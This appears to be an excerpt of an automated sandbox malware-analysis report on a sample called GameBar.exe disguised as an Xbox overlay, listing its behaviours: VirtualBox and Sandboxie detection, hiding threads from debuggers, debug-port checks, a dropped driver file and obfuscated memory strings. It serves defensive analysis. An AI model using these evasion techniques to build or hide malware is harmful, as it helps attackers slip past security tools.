Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\GameBar.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\System32\dwm.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\GameBar.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: GameBar.exe, 00000018.00000002.563633381.000001BDCCADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: GameBar.exe, 00000000.00000002.463697359.000001CCE44FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLQ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep count: 9710 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 9142 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep count: 9301 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096	Thread sleep count: 9168 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 324	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080	Thread sleep count: 9307 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep count: 9623 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9710	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9142	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9301
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9168
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9307	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9623

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\System32\dwm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\GameBar.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: GameBar.exe, 00000000.00000002.463697359.000001CCE44FB000.00000004.00000020.00020000.00000000.sdmp, GameBar.exe, 00000018.00000002.563633381.000001BDCCADB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: 9:*\PSO^BVmcilax
Source: GameBar.exe	Binary or memory string: WXI47;,0*%SF_jrkiaabl 1&N(>(9YAPG6(=U2'8Q\Usi>>8612)3'+9+6-31+T_G47;,0*%RK]jrkiaabl4(N9?U&/+@YHU&,4O7)2[_Dkiaabl$.><-$$';'-5&"$0>.++%>B[R-,,>1$1PXUilax/<#G!8;U =0#VTED-1&D2)#_HVmcilax?8555#5'1<2=3('!539 >PYF= $320*G^^qkpx3<8O428D+ "(PSZA7! N:$ J^Bfjqk
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6E9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: GameBar.exe	Binary or memory string: %5047''4'<1 0HP\>0+)-8! SWZpbmcilax/<#G!8;U".4'(-:(XG]D2)#_HVmcilax?8555#5'1<2=3('!51$$-.%1=_V_3":(+5"0XHLaoybdasi8!D12)A3# &% (9ZF^G"#1JTYybdasi>>8632#3 1&<>%5047''4'<1 0HP\>0+)-8! SWZpbmcilax9''G!8;U".4'(-:(XG]D2)#_HVmcilax?855#81'1<2=3('!51*$$-.%1=_V_3":(
Source: GameBar.exe	Binary or memory string: 66(6$/1(&-3":(+5"0kpx =0#USKD-1&D2)#^ETmcilax?855#81'6&-; ! +-Z[Y>%/==>+(^TNktfjqkpx =0#VTED-1&D2)#_HVmcilax?855#81'6&-; ! +-Y\W>%/==>+(_YLktfjqkpx%'<O622D+ "(PSZA7! N:$ J^Bfjqkpx5#= )668!66(6$/#?*(3PJS+!)<4#0 ]LTdasi.:.D32#A10$"[YWU,7+G"#1KY[ybdasi>>86%)'
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ))`ablKvmcilaxs
Source: GameBar.exe	Binary or memory string: "1,<>%50454#04BMW0>!)> !+AS]aabl4(N-?2U&/+@YHU&,4O7)2[_Dkiaabl$.><-$$'/'55&"$0>.++%>B[R-,,>1$1PXUilax/<#G58#U =0#VTED-1&D2)#_HVmcilax?8555#5'%<=3('!539 >PYF=* $320G^^qkpx$,=!L6.!D 3+-APUN./,U8<'XD]px5#=!"7!/-.%2#3'+9+6-31+WXI47;,0*%SF_jrkiaabl5!)+
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: _HVmcilax
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6E9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ))`ablyvmcilax
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ))`abl\|vmcilax
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: 66(6$/!,., -1+WXI43:"0%asi/1/!$L'/41,N-,='8/+@YHU2'8PQWsi>>86$"&$5=( -? '<=2".(15$#5+%>B[R-(+">1$1PXUilax.7""4F5;%<8O' >,&>"(STTA#,PQXax?8554(40$0<! 226=;?!>"#!5.!(3SM]+%(24#0 \AVdasi/1/!$L0?1O."$)-4"5WXIF#0 ]LTdasi>>86$"&$5=?0(361?<9)0&54-&8=USK6)0(62)#^ETmcilax.7""4F"+ B:#)$?%#3Y\WL1$1QUWilax?8554(40$0+1%>$ >:4* ,' <+,<[YW'(6%5"#1KY[ybdasi:! D" /)<.$"X^YU8<'XD]px5#=4286=;?!>"#!5.!(3PJS+%(24#0 ]LTdasi:! D" /)<.$"[YWU8<'YI_px5#=4286=;?!>"#!5.!(3SM]+%(24#0 \AVdasi.:.D12)A3# &% (9ZF^G"#1JTYybdasi>>86%)'3 1&<>%5047''4'<1 0HP\>0+)-8! SWZpbmcilax/<#G!8;U".4'(-:(XG]D2)#_HVmcilax?8555#5'1<2=3('!51$$-.%1=_V_3":(+5"0XHLaoybdasi8!D12)A3# &% (9ZF^G"#1JTYybdasi>>8632#3 1&<>%5047''4'<1 0HP\>0+)-8! SWZpbmcilax9''G!8;U".4'(-:(XG]D2)#_HVmcilax?855#81'1<2=3('!51$$-.%1=_V_3":(+5"0XHLaoybdasi/1/!$L2?;O."$)-4"5WXIF#0 ]LTdasi>>86$"&$5==0"361?<9)0&54-&8=USK6)0(62)#^ETmcilax.7""4F +B:#)$?%#3Y\WL1$1QUWilax?8554(40$0)1/>$ >:4* ,' <+,<[YW'(6%5"#1KY[ybdasi-=8=SQR]]%"0=TXU,;5>IRpx5#=#. =8A_XQQS3'+9+6^YI_C9)??/1,&-bdasi-=8=SQR]],8/%A&78 _^qkpx5#=#. =8A_XQQS3'+9+6"44'+!%"?"KU^Hbdasi-=8=SQS^]%"0=TXIYY!%"?HAP]ybdasi-=8=SQS^],8/%A&78 WXqkpx(+<#I"1G!#(aabl$.><;? '<=2"."4= 0: '> !+rkiaabl#'('D?)9ktfjqkpx5#=6226=;?!>2')4=.!320tfjqkpx%'<O 2 D97.-L2-pbmcilax?8555#5'%<=3('!5!.,%>!.3=>+(lax/<#G#81U2<&I2;(jrkiaabl$.><-$$'9''5&"$0><<' >0+)-8! abl1&%N:)$<F'.+qkpx5#= ),
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ))`abltvmcilax
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: 66(6$/1(&-3":(+5"0kpx =0#USKD-1&D2)#^ETmcilax?855#81'6&-; ! +-Z[Y>%/==>+(^TNktfjqkpx =0#VTED-1&D2)#_HVmcilax?855#81'6&-; ! +-Y\W>%/==>+(_YLktfjqkpx%'<O622D+ "(PSZA7! N:$ J^Bfjqkpx5#= )668!66(6$/#?(3PJS+!)<4#0 ]LTdasi.:.D32#A10$"[YWU,7+G"#1KY[ybdasi>>86%)'3"1,<>%50454#04BMW0>!)> !+AS]aabl4(N-?2U&/+@YHU&,4O7)2[_Dkiaabl$.><-$$'/'55&"$0>.++%>B[R-,,>1$1PXUilax/<#G58#U =0#VTED-1&D2)#_HVmcilax?8555#5'%<=3('!539 >PYF= $320G^^qkpx$,=!L6.!D 3+-APUN./,U8<'XD]px5#=!"7!/-.%2#3'+9+6-31+WXI47;,0%SF_jrkiaabl5!)+,A$;/''G0999SZOO#">D9:ZYUbl$.><,/%0.+#)581'6&-; ! +-Y\W>%/==>+(_YLktfjqkpx$,=!L2;#3Z[YL%/=O>+(^TNktfjqkpx5#=!"7!/-9: >5%$2";% 'ZF^56(='2'8PQWsi/1/!$L#>9#_V_A&;&Y5"0XHLaoybdasi>>86$"&$5=?0(361?<9+#"1'SZO=#">69:ZYUbl 1&N(>(9ZF^G6(=U2'8PQWsi>>8612)3'+9+6-31+WXI47;,0*%SF_jrkiaabl 1&N(>(9YAPG6(=U2'8Q\Usi>>8612)3'+9+6-31+T_G47;,0*%RK]jrkiaabl4(N9?U&/+@YHU&,4O7)2[_Dkiaabl$.><-$$';'-5&"$0>.++%>B[R-,,>1$1PXUilax/<#G!8;U =0#VTED-1&D2)#_HVmcilax?8555#5'1<2=3('!539 >PYF= $320G^^qkpx3<8O428D+ "(PSZA7! N:$ J^Bfjqkpx5#=6226:! 66(6$/#?(3PJS+!)<4#0 ]LTdasi8!D12)A10$"[YWU,7+G"#1KY[ybdasi>>8632#3 1&<>%50454#04BMW0>!)> !+AS]aabl$.><,!1,2+4/?.775&86-.=6#<-&>2!?&bmcilax?8557<4#.:);20:<rki"-,8pbmc:>7ktfjqkpx
Source: GameBar.exe, 00000018.00000003.469597182.000001BDCD050000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmci)
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: ))`ablyVmcilaxc
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6E9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: RO_HVmcilax9''G"#1KL\AVdasi
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: 1ZXPIFMRjqkpx)"8!D&<:>RX]OPSAIVmcilax,;5>Q9PKUAHRISCY[rki
Source: GameBar.exe, 00000000.00000002.465302112.00007FF67220C000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: IVmcilax,;5>Q9PKUAHRIXGi

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\GameBar.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\GameBar.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process queried: DebugPort	Jump to behavior
